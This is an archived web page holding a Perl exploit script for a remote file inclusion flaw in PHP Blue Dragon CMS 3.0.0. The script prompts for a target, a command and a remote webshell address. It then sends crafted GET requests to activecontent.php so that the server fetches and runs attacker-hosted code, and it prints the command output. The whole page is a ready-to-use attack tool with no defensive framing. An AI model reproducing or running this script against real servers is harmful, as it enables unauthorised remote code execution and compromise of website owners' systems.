Home / os / solaris

egs-fuckphpbluedragon300.pl.txt

Posted on 14 August 2007

#!usr/bin/perl # # egs-fuckphpbluedragon300.pl # # * Copyright 2007 Emanuele Gentili <bathym@0x656d67.org> # * # * www.emanuele-gentili.com # * # * This program is free software; you can redistribute it and/or modify # * it under the terms of the GNU General Public License as published by # * the Free Software Foundation; either version 2 of the License, or # * (at your option) any later version. # * # * This program is distributed in the hope that it will be useful, # * but WITHOUT ANY WARRANTY; without even the implied warranty of # * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # * GNU General Public License for more details. # * # * You should have received a copy of the GNU General Public License # * along with this program; if not, write to the Free Software # * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # * # # README: # # PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability # http://phpbluedragon.pl # use IO::Socket print " [+] Insert Hostname: "; chomp ($host=<STDIN>); print " [+] Insert webserver port (example: 80): "; chomp (${port}=<STDIN>); print " [+] Insert path: (example: /public_includes/pub_blocks/): "; chomp (${path}=<STDIN>); print " [+] Command to execute: "; chomp (${cmd}=<STDIN>); print " [+] Insert webshell address: "; chomp (${shell}=<STDIN>); while(${cmd} !~ "QUIT") { ${sock} = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"${host}", PeerPort=>"${port}") or die " [+] Connecting ... Can't connect to host. "; print $sock "GET $path"."activecontent.php?vsDragonRootPath="."${shell}"."?cmd="."${cmd}"."? HTTP/1.1 "; print $sock "Host: ${host} "; print $sock "User-Agent: EG Security "; print $sock "Accept: */* "; print $sock "Connection: close "; while (${answer} = <${socket}>) { print "${answer}"; } }

 

TOP